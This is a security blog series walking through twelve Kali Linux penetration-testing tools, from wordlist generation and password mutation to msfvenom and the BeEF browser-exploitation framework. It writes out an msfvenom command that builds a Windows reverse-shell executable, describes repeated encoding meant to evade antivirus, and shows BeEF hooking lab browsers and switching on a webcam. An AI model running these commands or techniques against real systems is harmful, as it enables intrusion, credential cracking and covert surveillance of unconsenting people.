Division Zero (Div0). Copyright © 2011-2018

All rights reserved.

12 Days of Christmas, Edgis Style

It's December. Christmas is round the corner. Hooray! We will be celebrating 12 Days of Christmas (Edgis Style). For a period of 12 days, we will be making a post each day on a useful tool that can be found in Kali Linux.

 

12 Days of Christmas

  • Day 1: CeWL

  • Day 2: Password Mutation using John the Ripper

  • Day 3: Hash Identification

  • Day 4: Using Online Hash Databases

  • Day 5: Zone Transfer Tool

  • Day 6: recon-ng

  • Day 7: urlcrazy

  • Day 8: searchsploit

  • Day 9: msfvenom

  • Day 10: nmap Scripting Engine (NSE)

  • Day 11: theharvester

  • Day 12: BeEF

 

Day 1: CeWL

The first tool to be introduced is CeWL (Custom Word List Generator). CeWL crawls through a target website and return all the unique words found within the site.

CeWL can be run directly from the terminal in Kali Linux by issuing the command:

cewl <target-site>

 

By default, this command will crawl through the target site, stopping at a maximum depth of 2. Also, it will (by default) return words that are at least of length 3.

 

To view all the options available in cewl, issue the command:

cewl --help

 

Some of the other useful options are:
-w / --write: Output to a word
-d / --depth <int>: Set the depth for CeWL to crawl
-m / --min_word_length: The minimum word length
-e / --email_file <filename>: Output email addresses to a file

 

Day 2: Password Mutation using John the Ripper

Previously, using CeWL, we have generated a wordlist by crawling a website. However, this wordlist may not be very useful in bruteforcing password as users normally append a few digits behind their password. E.g. "password" may be mutated by the user to "password01".

 

John the Ripper, can help to generate a new word list by including such mutation. To do that, new rules need to be created in the configuration file. By default, the location of the configuration file is /etc/john.conf. To add a new rule, simply append the rules to the configuration file.

 

To define a rule set that append a digit to the words in the word, append the following to the configuration file:

[List.Rules:AppendDigit] $[0-9]

 

To define a rule set that append 2 digits to the words in the word, append the following to the configuration file:

[List.Rules:AppendDigits] $[0-9]$[0-9]

 

To define a rule set that appends a pre-defined set of symbols to the words in the word, append the following to the configuration file:

[List.Rules:AppendSymbol] $[@#$%&*]

 

To prepend instead of append, simply replace '$' with '^'.

 

Lastly, to generate the new wordlist with password mutation, simply use the following command in the terminal.

john --wordlist=[path to the wordlist] --stdout --rules:[rule set name] > [genenerated wordlist file path]

 

E.g.:

john --wordlist=wordlist --stdout --rule:AppendDigits > newWordList

 

Looking at the new word list, you will notice 2 extra digits have been appended to each word. This also increases the size of the word list.

 

Day 3: Hash Identification

It is useful to identify the type of hash algorithm for a certain digest. It can help in password cracking by reducing the search space. In Kali, hash-identification can help to predict the hash algorithm used to derive a certain digest.

The usage is simple. The user will just need to input the digest, and the hash-identifier will attempt to guess the hash algorithm used. It will then provide a list of possible hash algorithm and least possible hash algorithm.

 

Demo

Original text: edgis
CRC32: 131f42b9
MD5: e362e35b7efc8910054871b0a8edb007
SHA-1: b58cba8c669711d9bb979eae8eaa8c7e255e58b5
SHA-256: c826002aac59efc150b847125b08adb790f3182408a241f99529144b48671bdf
Tiger: d9c78330bce66fe05c0540f79cb6c6ac435c1e7bbb4351e0

 

Day 4: Using Online Hash Databases

After identifying the type of hash algorithm, we can now try and crack the digest. One useful tool found in Kali Linux is findmyhash. findmyhash look up several online databases for a specific digest. Once it find a match, it will stop and return the corresponding text that can be used to derive the digest.

findmyhash <hash algorithm> -h <hash>

 

Demo

Original text: password
MD5: 5f4dcc3b5aa765d61d8327deb882cf99
SHA-1: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

Do note that this process may take some time and may not yield any result (if the digest cannot be found in any of the online databases used by findmyhash).

 

Day 5: Zone Transfer Tool

Misconfigured DNS can often lead to exposure of data. One such example is the use of DNS zone transfer to discover information about an organisation. Dig and Host can be used to conduct zone transfer. In Kali Linux, zone transfer is made even easier with dnsenum.

dnsenum <URL of Site>

 

There are many options available in dnsenum. Some of the useful one are:

-t / --timeout: TCP and UDP timeout in seconds
--thread <values>: Set the number of threads to perform different queries

 

To view more options, use -h / --help

 

Day 6: recong-ng

recong-ng is a powerful full-featured web reconnaissance framework. The usage is very similar to the Metasploit Framework (MSF).

 There you go. Contact details of the domain name holder.

 

There are a lot of modules to explore. Some of the more interesting one:

recon/companies-contacts/facebook

recon/creds-creds/leakdb

recon/domain-creds/pwnedlist/leaks_dump

recon/hosts-hosts/ip_neighbor

recon/locations-locations/reverse_geocode

 

Have fun "recon-ing". :D

 

Day 7: urlcrazy

urlcrazy is a tool in Kali Linux that generates and test domain name typos and variations to detect typosquatting, URL hijacking, phishing and corporate espionage.

 

Day 8: searchsploit

searchsploit makes searching for exploits found inside Kali Linux very easy.

By specifying a keyword, searchsploit returns matching results and the file path to the exploit.

 

Day 9: msfvenom

msfvenom is the successor of msfpayload and msfencode. Both msfpayload and msfencode are slated for retirement in the near future (June 2015). msfvenom consolidates the features of its predecessor and standardise its usage.

 

msfvenom is able to (1) generate various types of shellcode (features of msfpayload) and (2) encode shellcodes into format that can be easily deployed onto targets (features of msfencode).

To show available output formats:

msfvenom --help-formats

 

Executable Formatsasp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war

 

Transform Formatsbash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

 

Demo: Generate Payload (windows/shell/reverse_tcp)

In this payload, we will need to define both LHOST and LPORT. In this demo, I will set it as 192.168.1.100 and 5555 respectively, and output the payload in Python format.

Many times, there may be some bad characters in the payload that will cause the exploit to fail. One such example is \x00, the null bytes. To remove them, we can use the -b options.

We can also output the payload in executable format:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -f exe > shell-exe

 

Note: In this case, 1 round of shikata_ga_nai encoding is applied automatically. shikata_ga_nai is a polymorphic XOR additive feedback encoder. We can do extra encoding to evade antivirus detection. To encode the payload with shitaka_ga_nai 10 times:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=5555 -b "\x00" -e "x86/shitaka_ga_nai" -i 10 -f exe > shell-exe

Now let us upload these 2 executables to VirusTotal and see the effect of the encoding.

VirusTotal Result for Executable with 1 Round of Encoding

VirusTotal Result for Executable with 10 Round of Encoding

 

Notice both payloads yield almost the same detection rate? This is because most antivirus vendors know the templates used by Metasploit.

 

Day 10: nmap Scripting Engine (NSE)

nmap Scripting Engine (NSE) features many scripts that can be used in a network penetration test. It allow users to write and automate networking tasks. It is written with the following features in mind (http://nmap.org/book/nse.html#nse-intro):

  • Network Discovery

  • More Sophisticated Version Detection

  • Vulnerability Detection

  • Backdoor Detection

  • Vulnerability Exploitation

A list of available scripts can be found in the nmap documentation (http://nmap.org/nsedoc/).

 

Day 11: theharvester

Written by Christian Martorella from Edge Security, theharvester is a tool (written in Python) that can help penetration testers understand their target’s footprint on the Internet. It does so by gathering emails, subdomains, hosts, employee names, open ports and banners from different public sources such as search engines, PGP key servers and SHODAN computer database.

 

theharverster is available preinstalled on Kali Linux. It can also be acquired via GitHub: https://github.com/laramies/theHarvester

~$ git clone git://github/laramies/theHarvester.git

As theharvester uses public sources, it is important to always use the latest version for effective results.

 

Day 12: BeEF

BeEF (Browser Exploitation Framework) is a penetration testing framework that focuses on the Web browser. BeEF is a very powerful penetration testing framework, as it looks past the hardened network and host system, and examine exploitability directly via your system’s open window – i.e. the Web browser.

 

Installation

As of all the other tools we’ve discussed thus far, BeEF is readily available in Kali Linux. Nonetheless, you can acquire BeEF from its Github repository. You can find installation instructions on either its INSTALL.txt file or Wiki page. If you are impatient, and using a Debian- or Red Hat-based distro), you can make use of its installation script (install-beef); although I strongly encourage you to read through the script prior to running it.

 

BeEF Architecture

BeEF has two major components:

  • The user interface that allows user to see all online and offline browsers it has hooked, and run exploits and information gathering against them.

  • The communication server communicates with the hooked browsers via HTTP.

 

Configuring and Running BeEF

All the main configurations of BeEF can be performed by modifying the config.yaml file. Some main configurations you should look into are:

  • Network limitations

  • Web server configuration

  • Extensions

 

If you examine the extensions section closely, you will realise you can configure BeEF to make use of Metasploit as well. If you are all set, start up your BeEF!

As you can see from here, I’m running my ‘Web service’ from 192.168.98.128, and only allowing access to the user interface from 127.0.0.1 (localhost).

 
Browser Hooking using BeEF

BeEF simply hook onto browsers that visited the Web pages it serve. Here I got 4 hosts hooked onto my BeEF.

  • 168.98.129 is a Damn Vulnerable Linux machine.

  • 168.98.130 is a Windows XP machine with no service pack.

  • 168.98.131 is a Windows XP SP3 machine.

  • 168.98.1 is a hardened Windows 7 machine (fully patched, and Kaspersky Antivirus installed).

The user interface is pretty self-explanatory. Here you can look at the browser and host information of the machine BeEF has hooked

And a list of things you can do to it (Green means it will work, Amber means the user may detect it, and Red means it won’t work).

It’s not just things you can do within the browser, but the host as well.

Here’s what you can do on a Linux machine using Firefox.

To demonstrate the magnificent of BeEF, here’s what you can do to a hardened Windows 7 machine. The antivirus did not even make the sound.

I tried using the Webcam feature, although it asked for permission to access my Webcam, but I’m sure there are definitely users out there who will click ‘allow’ without thinking too much about it. It of course switched on my Webcam. See that tiny light?

Defence against BeEF

Common sense, do not visit unsolicited Web sites.

 

That’s about it from me…

It is not possible to cover every single aspects of BeEF in one short post, however it is definitely an amazing tool to look into for our very last episode of Edgis’s 12 Days of Christmas. To learn more about BeEF, please visit its Wiki page.

Share on Facebook
Share on Twitter
Please reload

RECENT POST

September 5, 2017

Please reload

CATEGORIES
Please reload

TAGS